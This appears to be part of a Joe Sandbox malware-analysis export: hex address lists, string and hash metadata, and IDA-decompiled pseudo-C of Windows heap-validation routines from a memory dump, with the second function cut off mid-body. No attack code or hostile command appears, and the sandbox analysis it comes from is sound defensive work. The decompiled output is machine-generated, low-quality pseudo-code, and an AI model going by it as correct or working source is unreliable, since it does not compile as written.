                                                                                                            0x01124bc8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124bd9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124b77
                                                                                                            0x01124b7a
                                                                                                            0x01124b8c
                                                                                                            0x01124b7c
                                                                                                            0x01124b7e
                                                                                                            0x01124b83
                                                                                                            0x01124b86
                                                                                                            0x01124b86
                                                                                                            0x01124b90
                                                                                                            0x01124b93
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124b95
                                                                                                            0x01124bab
                                                                                                            0x01124bb0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124bb2
                                                                                                            0x01124bb9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124bbb
                                                                                                            0x01124bbe
                                                                                                            0x01124bc1
                                                                                                            0x01124bc1
                                                                                                            0x00000000
                                                                                                            0x01124bc1
                                                                                                            0x01124b97
                                                                                                            0x01124ba4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124ba6
                                                                                                            0x00000000
                                                                                                            0x01124ba6
                                                                                                            0x01124ea9
                                                                                                            0x01124ea9
                                                                                                            0x01124eb2
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                            • API String ID: 0-3591852110
                                                                                                            • Opcode ID: b670a731c6fca260918bd7f4529cadc56b33a1dcf20302035cfc372cedf32a90
                                                                                                            • Instruction ID: 61966980badd7f1dc5a4ae7d639218df085b13ad9c129aad46b9eb86763825c6
                                                                                                            • Opcode Fuzzy Hash: b670a731c6fca260918bd7f4529cadc56b33a1dcf20302035cfc372cedf32a90
                                                                                                            • Instruction Fuzzy Hash: 1212DE70200662DFE72DCF2DC494BBABBE5FF48704F158459E5868BA41D738E8A0CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 56%
                                                                                                            			E01124496(signed int* __ecx, void* __edx) {
                                                                                                            				signed int _v5;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed char _v24;
                                                                                                            				signed int* _v28;
                                                                                                            				char _v32;
                                                                                                            				signed int* _v36;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t150;
                                                                                                            				intOrPtr _t151;
                                                                                                            				signed char _t156;
                                                                                                            				intOrPtr _t157;
                                                                                                            				unsigned int _t169;
                                                                                                            				intOrPtr _t170;
                                                                                                            				signed int* _t183;
                                                                                                            				signed char _t184;
                                                                                                            				intOrPtr _t191;
                                                                                                            				signed int _t201;
                                                                                                            				intOrPtr _t203;
                                                                                                            				intOrPtr _t212;
                                                                                                            				intOrPtr _t220;
                                                                                                            				signed int _t230;
                                                                                                            				signed int _t241;
                                                                                                            				signed int _t244;
                                                                                                            				void* _t259;
                                                                                                            				signed int _t260;
                                                                                                            				signed int* _t261;
                                                                                                            				intOrPtr* _t262;
                                                                                                            				signed int _t263;
                                                                                                            				signed int* _t264;
                                                                                                            				signed int _t267;
                                                                                                            				signed int* _t268;
                                                                                                            				void* _t270;
                                                                                                            				void* _t281;
                                                                                                            				signed short _t285;
                                                                                                            				signed short _t289;
                                                                                                            				signed int _t291;
                                                                                                            				signed int _t298;
                                                                                                            				signed char _t303;
                                                                                                            				signed char _t308;
                                                                                                            				signed int _t314;
                                                                                                            				intOrPtr _t317;
                                                                                                            				unsigned int _t319;
                                                                                                            				signed int* _t325;
                                                                                                            				signed int _t326;
                                                                                                            				signed int _t327;
                                                                                                            				intOrPtr _t328;
                                                                                                            				signed int _t329;
                                                                                                            				signed int _t330;
                                                                                                            				signed int* _t331;
                                                                                                            				signed int _t332;
                                                                                                            				signed int _t350;
                                                                                                            
                                                                                                            				_t259 = __edx;
                                                                                                            				_t331 = __ecx;
                                                                                                            				_v28 = __ecx;
                                                                                                            				_v20 = 0;
                                                                                                            				_v12 = 0;
                                                                                                            				_t150 = E011249A4(__ecx);
                                                                                                            				_t267 = 1;
                                                                                                            				if(_t150 == 0) {
                                                                                                            					L61:
                                                                                                            					_t151 =  *[fs:0x30];
                                                                                                            					__eflags =  *((char*)(_t151 + 2));
                                                                                                            					if( *((char*)(_t151 + 2)) != 0) {
                                                                                                            						 *0x1156378 = _t267;
                                                                                                            						asm("int3");
                                                                                                            						 *0x1156378 = 0;
                                                                                                            					}
                                                                                                            					__eflags = _v12;
                                                                                                            					if(_v12 != 0) {
                                                                                                            						_t105 =  &_v16;
                                                                                                            						 *_t105 = _v16 & 0x00000000;
                                                                                                            						__eflags =  *_t105;
                                                                                                            						E0109174B( &_v12,  &_v16, 0x8000);
                                                                                                            					}
                                                                                                            					L65:
                                                                                                            					__eflags = 0;
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                                                                            					_t268 =  &(_t331[0x30]);
                                                                                                            					_v32 = 0;
                                                                                                            					_t260 =  *_t268;
                                                                                                            					_t308 = 0;
                                                                                                            					_v24 = 0;
                                                                                                            					while(_t268 != _t260) {
                                                                                                            						_t260 =  *_t260;
                                                                                                            						_v16 =  *_t325 & 0x0000ffff;
                                                                                                            						_t156 = _t325[0];
                                                                                                            						_v28 = _t325;
                                                                                                            						_v5 = _t156;
                                                                                                            						__eflags = _t156 & 0x00000001;
                                                                                                            						if((_t156 & 0x00000001) != 0) {
                                                                                                            							_t157 =  *[fs:0x30];
                                                                                                            							__eflags =  *(_t157 + 0xc);
                                                                                                            							if( *(_t157 + 0xc) == 0) {
                                                                                                            								_push("HEAP: ");
                                                                                                            								E0106B150();
                                                                                                            							} else {
                                                                                                            								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            							}
                                                                                                            							_push(_t325);
                                                                                                            							E0106B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                                                                            							L32:
                                                                                                            							_t270 = 0;
                                                                                                            							__eflags = _t331[0x13];
                                                                                                            							if(_t331[0x13] != 0) {
                                                                                                            								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                                                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                                                            							}
                                                                                                            							L60:
                                                                                                            							_t267 = _t270 + 1;
                                                                                                            							__eflags = _t267;
                                                                                                            							goto L61;
                                                                                                            						}
                                                                                                            						_t169 =  *_t325 & 0x0000ffff;
                                                                                                            						__eflags = _t169 - _t308;
                                                                                                            						if(_t169 < _t308) {
                                                                                                            							_t170 =  *[fs:0x30];
                                                                                                            							__eflags =  *(_t170 + 0xc);
                                                                                                            							if( *(_t170 + 0xc) == 0) {
                                                                                                            								_push("HEAP: ");
                                                                                                            								E0106B150();
                                                                                                            							} else {
                                                                                                            								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            							}
                                                                                                            							E0106B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                                                                            							goto L32;
                                                                                                            						} else {
                                                                                                            							__eflags = _t331[0x13];
                                                                                                            							_t308 = _t169;
                                                                                                            							_v24 = _t308;
                                                                                                            							if(_t331[0x13] != 0) {
                                                                                                            								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                                                                            								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                                                            								__eflags =  *_t325;
                                                                                                            							}
                                                                                                            							_t26 =  &_v32;
                                                                                                            							 *_t26 = _v32 + 1;
                                                                                                            							__eflags =  *_t26;
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                                                                            					if( *0x1156350 != 0 && _t331[0x2f] != 0) {
                                                                                                            						_push(4);
                                                                                                            						_push(0x1000);
                                                                                                            						_push( &_v16);
                                                                                                            						_push(0);
                                                                                                            						_push( &_v12);
                                                                                                            						_push(0xffffffff);
                                                                                                            						if(E010A9660() >= 0) {
                                                                                                            							_v20 = _v12 + 0x204;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t183 =  &(_t331[0x27]);
                                                                                                            					_t281 = 0x81;
                                                                                                            					_t326 =  *_t183;
                                                                                                            					if(_t183 == _t326) {
                                                                                                            						L49:
                                                                                                            						_t261 =  &(_t331[0x29]);
                                                                                                            						_t184 = 0;
                                                                                                            						_t327 =  *_t261;
                                                                                                            						_t282 = 0;
                                                                                                            						_v24 = 0;
                                                                                                            						_v36 = 0;
                                                                                                            						__eflags = _t327 - _t261;
                                                                                                            						if(_t327 == _t261) {
                                                                                                            							L53:
                                                                                                            							_t328 = _v32;
                                                                                                            							_v28 = _t331;
                                                                                                            							__eflags = _t328 - _t184;
                                                                                                            							if(_t328 == _t184) {
                                                                                                            								__eflags = _t331[0x1d] - _t282;
                                                                                                            								if(_t331[0x1d] == _t282) {
                                                                                                            									__eflags = _v12;
                                                                                                            									if(_v12 == 0) {
                                                                                                            										L82:
                                                                                                            										_t267 = 1;
                                                                                                            										__eflags = 1;
                                                                                                            										goto L83;
                                                                                                            									}
                                                                                                            									_t329 = _t331[0x2f];
                                                                                                            									__eflags = _t329;
                                                                                                            									if(_t329 == 0) {
                                                                                                            										L77:
                                                                                                            										_t330 = _t331[0x22];
                                                                                                            										__eflags = _t330;
                                                                                                            										if(_t330 == 0) {
                                                                                                            											L81:
                                                                                                            											_t129 =  &_v16;
                                                                                                            											 *_t129 = _v16 & 0x00000000;
                                                                                                            											__eflags =  *_t129;
                                                                                                            											E0109174B( &_v12,  &_v16, 0x8000);
                                                                                                            											goto L82;
                                                                                                            										}
                                                                                                            										_t314 = _t331[0x21] & 0x0000ffff;
                                                                                                            										_t285 = 1;
                                                                                                            										__eflags = 1 - _t314;
                                                                                                            										if(1 >= _t314) {
                                                                                                            											goto L81;
                                                                                                            										} else {
                                                                                                            											goto L79;
                                                                                                            										}
                                                                                                            										while(1) {
                                                                                                            											L79:
                                                                                                            											_t330 = _t330 + 0x40;
                                                                                                            											_t332 = _t285 & 0x0000ffff;
                                                                                                            											_t262 = _v20 + _t332 * 4;
                                                                                                            											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                                                                            											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                                                                            												break;
                                                                                                            											}
                                                                                                            											_t285 = _t285 + 1;
                                                                                                            											__eflags = _t285 - _t314;
                                                                                                            											if(_t285 < _t314) {
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L81;
                                                                                                            										}
                                                                                                            										_t191 =  *[fs:0x30];
                                                                                                            										__eflags =  *(_t191 + 0xc);
                                                                                                            										if( *(_t191 + 0xc) == 0) {
                                                                                                            											_push("HEAP: ");
                                                                                                            											E0106B150();
                                                                                                            										} else {
                                                                                                            											E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            										}
                                                                                                            										_push(_t262);
                                                                                                            										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                                                                            										_t148 = _t330 + 0x10; // 0x10
                                                                                                            										_push( *((intOrPtr*)(_t330 + 8)));
                                                                                                            										E0106B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                                                                            										L59:
                                                                                                            										_t270 = 0;
                                                                                                            										__eflags = 0;
                                                                                                            										goto L60;
                                                                                                            									}
                                                                                                            									_t289 = 1;
                                                                                                            									__eflags = 1;
                                                                                                            									while(1) {
                                                                                                            										_t201 = _v12;
                                                                                                            										_t329 = _t329 + 0xc;
                                                                                                            										_t263 = _t289 & 0x0000ffff;
                                                                                                            										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                                                                                            										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                                                                                            											break;
                                                                                                            										}
                                                                                                            										_t289 = _t289 + 1;
                                                                                                            										__eflags = _t289 - 0x81;
                                                                                                            										if(_t289 < 0x81) {
                                                                                                            											continue;
                                                                                                            										}
                                                                                                            										goto L77;
                                                                                                            									}
                                                                                                            									_t203 =  *[fs:0x30];
                                                                                                            									__eflags =  *(_t203 + 0xc);
                                                                                                            									if( *(_t203 + 0xc) == 0) {
                                                                                                            										_push("HEAP: ");
                                                                                                            										E0106B150();
                                                                                                            									} else {
                                                                                                            										E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            									}
                                                                                                            									_t291 = _v12;
                                                                                                            									_push(_t291 + _t263 * 4);
                                                                                                            									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                                                                                            									_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                            									E0106B150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                                                                                            									goto L59;
                                                                                                            								}
                                                                                                            								_t212 =  *[fs:0x30];
                                                                                                            								__eflags =  *(_t212 + 0xc);
                                                                                                            								if( *(_t212 + 0xc) == 0) {
                                                                                                            									_push("HEAP: ");
                                                                                                            									E0106B150();
                                                                                                            								} else {
                                                                                                            									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            								}
                                                                                                            								_push(_t331[0x1d]);
                                                                                                            								_push(_v36);
                                                                                                            								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                                                                                            								L58:
                                                                                                            								E0106B150();
                                                                                                            								goto L59;
                                                                                                            							}
                                                                                                            							_t220 =  *[fs:0x30];
                                                                                                            							__eflags =  *(_t220 + 0xc);
                                                                                                            							if( *(_t220 + 0xc) == 0) {
                                                                                                            								_push("HEAP: ");
                                                                                                            								E0106B150();
                                                                                                            							} else {
                                                                                                            								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                            							}
                                                                                                            							_push(_t328);
                                                                                                            							_push(_v24);
                                                                                                            							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                                                            							goto L58;
                                                                                                            						} else {
                                                                                                            							goto L50;
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							L50:
                                                                                                            							_t92 = _t327 - 0x10; // -24
                                                                                                            							_t282 = _t331;
                                                                                                            							_t230 = E01124AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                                                                                            							__eflags = _t230;
                                                                                                            							if(_t230 == 0) {
                                                                                                            								goto L59;
                                                                                                            							}
                                                                                                            							_t327 =  *_t327;
                                                                                                            							__eflags = _t327 - _t261;
                                                                                                            							if(_t327 != _t261) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							_t184 = _v24;
                                                                                                            							_t282 = _v36;
                                                                                                            							goto L53;
                                                                                                            						}
                                                                                                            						goto L59;
                                                                                                            					} else {
                                                                                                            						while(1) {
                                                                                                            							_t39 = _t326 + 0x18; // 0x10
                                                                                                            							_t264 = _t39;
                                                                                                            							if(_t331[0x13] != 0) {
                                                                                                            								_t319 = _t331[0x14] ^  *_t264;
                                                                                                            								 *_t264 = _t319;
                                                                                                            								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                                                                                            								_t348 = _t319 >> 0x18 - _t303;
                                                                                                            								if(_t319 >> 0x18 != _t303) {
                                                                                                            									_push(_t303);
                                                                                                            									E0111FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                                                                                            								}
                                                                                                            								_t281 = 0x81;
                                                                                                            							}
                                                                                                            							_t317 = _v20;
                                                                                                            							if(_t317 != 0) {
                                                                                                            								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                                                                                            								_t350 = _t241;
                                                                                                            								if(_t350 != 0) {
                                                                                                            									if(_t350 >= 0) {
                                                                                                            										__eflags = _t241 & 0x00000800;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											__eflags = _t241 - _t331[0x21];
                                                                                                            											if(__eflags < 0) {
                                                                                                            												_t298 = _t241;
                                                                                                            												_t65 = _t317 + _t298 * 4;
                                                                                                            												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                                                                                            												__eflags =  *_t65;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t244 = _t241 & 0x00007fff;
                                                                                                            										if(_t244 < _t281) {
                                                                                                            											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E011123E3(_t331, _t264) == 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							if(_t331[0x13] != 0) {
                                                                                                            								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                                                                                            								 *_t264 =  *_t264 ^ _t331[0x14];
                                                                                                            							}
                                                                                                            							_t326 =  *_t326;
                                                                                                            							if( &(_t331[0x27]) == _t326) {
                                                                                                            								goto L49;
                                                                                                            							} else {
                                                                                                            								_t281 = 0x81;
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						__eflags = _t331[0x13];
                                                                                                            						if(_t331[0x13] != 0) {
                                                                                                            							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                                                                                            							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                                                                                            						}
                                                                                                            						goto L65;
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					L83:
                                                                                                            					return _t267;
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x01124987
                                                                                                            0x0112498a
                                                                                                            0x0112498d
                                                                                                            0x01124997
                                                                                                            0x011247ef
                                                                                                            0x011247ef
                                                                                                            0x011247ef
                                                                                                            0x00000000
                                                                                                            0x011247ef
                                                                                                            0x01124890
                                                                                                            0x01124890
                                                                                                            0x01124891
                                                                                                            0x01124891
                                                                                                            0x01124894
                                                                                                            0x01124897
                                                                                                            0x0112489d
                                                                                                            0x011248a0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248a2
                                                                                                            0x011248a3
                                                                                                            0x011248a6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x011248a6
                                                                                                            0x011248fb
                                                                                                            0x01124901
                                                                                                            0x01124905
                                                                                                            0x01124924
                                                                                                            0x01124929
                                                                                                            0x01124907
                                                                                                            0x0112491c
                                                                                                            0x01124921
                                                                                                            0x0112492f
                                                                                                            0x01124935
                                                                                                            0x01124936
                                                                                                            0x01124939
                                                                                                            0x01124942
                                                                                                            0x00000000
                                                                                                            0x01124947
                                                                                                            0x01124835
                                                                                                            0x0112483b
                                                                                                            0x0112483f
                                                                                                            0x0112485e
                                                                                                            0x01124863
                                                                                                            0x01124841
                                                                                                            0x01124856
                                                                                                            0x0112485b
                                                                                                            0x01124869
                                                                                                            0x0112486c
                                                                                                            0x0112486f
                                                                                                            0x011247e7
                                                                                                            0x011247e7
                                                                                                            0x00000000
                                                                                                            0x011247ec
                                                                                                            0x011247aa
                                                                                                            0x011247b0
                                                                                                            0x011247b4
                                                                                                            0x011247d3
                                                                                                            0x011247d8
                                                                                                            0x011247b6
                                                                                                            0x011247cb
                                                                                                            0x011247d0
                                                                                                            0x011247de
                                                                                                            0x011247df
                                                                                                            0x011247e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0112476f
                                                                                                            0x0112476f
                                                                                                            0x01124778
                                                                                                            0x01124785
                                                                                                            0x01124787
                                                                                                            0x0112478c
                                                                                                            0x0112478e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124790
                                                                                                            0x01124792
                                                                                                            0x01124794
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124796
                                                                                                            0x01124799
                                                                                                            0x00000000
                                                                                                            0x01124799
                                                                                                            0x00000000
                                                                                                            0x011245c3
                                                                                                            0x011245c3
                                                                                                            0x011245c7
                                                                                                            0x011245c7
                                                                                                            0x011245ca
                                                                                                            0x011245cf
                                                                                                            0x011245d3
                                                                                                            0x011245df
                                                                                                            0x011245e4
                                                                                                            0x011245e6
                                                                                                            0x011245e8
                                                                                                            0x011245ed
                                                                                                            0x011245ed
                                                                                                            0x011245f2
                                                                                                            0x011245f2
                                                                                                            0x011245f7
                                                                                                            0x011245fc
                                                                                                            0x01124602
                                                                                                            0x01124606
                                                                                                            0x01124609
                                                                                                            0x0112460f
                                                                                                            0x011246de
                                                                                                            0x011246e3
                                                                                                            0x011246e5
                                                                                                            0x011246ec
                                                                                                            0x011246ee
                                                                                                            0x011246f6
                                                                                                            0x011246f6
                                                                                                            0x011246f6
                                                                                                            0x011246f6
                                                                                                            0x011246ec
                                                                                                            0x01124615
                                                                                                            0x01124615
                                                                                                            0x0112461d
                                                                                                            0x0112462e
                                                                                                            0x0112462e
                                                                                                            0x0112461d
                                                                                                            0x0112460f
                                                                                                            0x01124609
                                                                                                            0x011246fd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01124710
                                                                                                            0x0112471a
                                                                                                            0x01124720
                                                                                                            0x01124720
                                                                                                            0x01124722
                                                                                                            0x0112472c
                                                                                                            0x00000000
                                                                                                            0x0112472e
                                                                                                            0x0112472e
                                                                                                            0x00000000
                                                                                                            0x0112472e
                                                                                                            0x0112472c
                                                                                                            0x01124738
                                                                                                            0x0112473c
                                                                                                            0x0112474b
                                                                                                            0x01124751
                                                                                                            0x01124751
                                                                                                            0x00000000
                                                                                                            0x0112473c
                                                                                                            0x011248f4
                                                                                                            0x011248f4
                                                                                                            0x00000000
                                                                                                            0x011248f4

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                            • API String ID: 0-1357697941
                                                                                                            • Opcode ID: c331580b162a771b1d7a0e2b793134e092b5acb37fbca261521f69f1b2fcdf65
                                                                                                            • Instruction ID: ece57c6cdab98fb3fd61a31839bbbe94a34c237957a41b55f94f9c5c32152d8b
                                                                                                            • Opcode Fuzzy Hash: c331580b162a771b1d7a0e2b793134e092b5acb37fbca261521f69f1b2fcdf65
                                                                                                            • Instruction Fuzzy Hash: 71F18871600666EFDB2DCFA9C480BBABBF5FF49304F048029E1869BA41D770A965CF51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 72%
                                                                                                            			E0108A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                                                                            				char _v8;
                                                                                                            				signed short _v12;
                                                                                                            				signed short _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed int _v24;
                                                                                                            				signed short _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				signed int _v40;
                                                                                                            				signed int _v44;
                                                                                                            				signed int _v48;
                                                                                                            				unsigned int _v52;
                                                                                                            				signed int _v56;
                                                                                                            				void* _v60;
                                                                                                            				intOrPtr _v64;
                                                                                                            				void* _v72;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __ebp;
                                                                                                            				unsigned int _t246;
                                                                                                            				signed char _t247;
                                                                                                            				signed short _t249;
                                                                                                            				unsigned int _t256;
                                                                                                            				signed int _t262;
                                                                                                            				signed int _t265;
                                                                                                            				signed int _t266;
                                                                                                            				signed int _t267;
                                                                                                            				intOrPtr _t270;
                                                                                                            				signed int _t280;
                                                                                                            				signed int _t286;
                                                                                                            				signed int _t289;
                                                                                                            				intOrPtr _t290;
                                                                                                            				signed int _t291;
                                                                                                            				signed int _t317;
                                                                                                            				signed short _t320;
                                                                                                            				intOrPtr _t327;
                                                                                                            				signed int _t339;
                                                                                                            				signed int _t344;
                                                                                                            				signed int _t347;
                                                                                                            				intOrPtr _t348;
                                                                                                            				signed int _t350;
                                                                                                            				signed int _t352;
                                                                                                            				signed int _t353;
                                                                                                            				signed int _t356;
                                                                                                            				intOrPtr _t357;
                                                                                                            				intOrPtr _t366;
                                                                                                            				signed int _t367;
                                                                                                            				signed int _t370;
                                                                                                            				intOrPtr _t371;
                                                                                                            				signed int _t372;
                                                                                                            				signed int _t394;
                                                                                                            				signed short _t402;
                                                                                                            				intOrPtr _t404;
                                                                                                            				intOrPtr _t415;
                                                                                                            				signed int _t430;
                                                                                                            				signed int _t433;
                                                                                                            				signed int _t437;
                                                                                                            				signed int _t445;
                                                                                                            				signed short _t446;
                                                                                                            				signed short _t449;
                                                                                                            				signed short _t452;
                                                                                                            				signed int _t455;
                                                                                                            				signed int _t460;
                                                                                                            				signed short* _t468;
                                                                                                            				signed int _t480;
                                                                                                            				signed int _t481;
                                                                                                            				signed int _t483;
                                                                                                            				intOrPtr _t484;
                                                                                                            				signed int _t491;
                                                                                                            				unsigned int _t506;
                                                                                                            				unsigned int _t508;
                                                                                                            				signed int _t513;
                                                                                                            				signed int _t514;
                                                                                                            				signed int _t521;
                                                                                                            				signed short* _t533;
                                                                                                            				signed int _t541;
                                                                                                            				signed int _t543;
                                                                                                            				signed int _t546;
                                                                                                            				unsigned int _t551;
                                                                                                            				signed int _t553;
                                                                                                            
                                                                                                            				_t450 = __ecx;
                                                                                                            				_t553 = __ecx;
                                                                                                            				_t539 = __edx;
                                                                                                            				_v28 = 0;
                                                                                                            				_v40 = 0;
                                                                                                            				if(( *(__ecx + 0xcc) ^  *0x1158a68) != 0) {
                                                                                                            					_push(_a4);
                                                                                                            					_t513 = __edx;
                                                                                                            					L11:
                                                                                                            					_t246 = E0108A830(_t450, _t513);
                                                                                                            					L7:
                                                                                                            					return _t246;
                                                                                                            				}
                                                                                                            				if(_a8 != 0) {
                                                                                                            					__eflags =  *(__edx + 2) & 0x00000008;
                                                                                                            					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                                                                            						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                                                                            						_t430 = E0108DF24(__edx,  &_v12,  &_v16);
                                                                                                            						__eflags = _t430;
                                                                                                            						if(_t430 != 0) {
                                                                                                            							_t157 = _t553 + 0x234;
                                                                                                            							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                                                                            							__eflags =  *_t157;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t445 = _a4;
                                                                                                            					_t514 = _t539;
                                                                                                            					_v48 = _t539;
                                                                                                            					L14:
                                                                                                            					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                                                                            					__eflags = _t247;
                                                                                                            					if(_t247 == 0) {
                                                                                                            						_t541 = _t553;
                                                                                                            					} else {
                                                                                                            						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                            						__eflags = _t541;
                                                                                                            					}
                                                                                                            					_t249 = 7 + _t445 * 8 + _t514;
                                                                                                            					_v12 = _t249;
                                                                                                            					__eflags =  *_t249 - 3;
                                                                                                            					if( *_t249 == 3) {
                                                                                                            						_v16 = _t514 + _t445 * 8 + 8;
                                                                                                            						E01069373(_t553, _t514 + _t445 * 8 + 8);
                                                                                                            						_t452 = _v16;
                                                                                                            						_v28 =  *(_t452 + 0x10);
                                                                                                            						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                                                                            						_v36 =  *(_t452 + 0x14);
                                                                                                            						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                                                                            						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
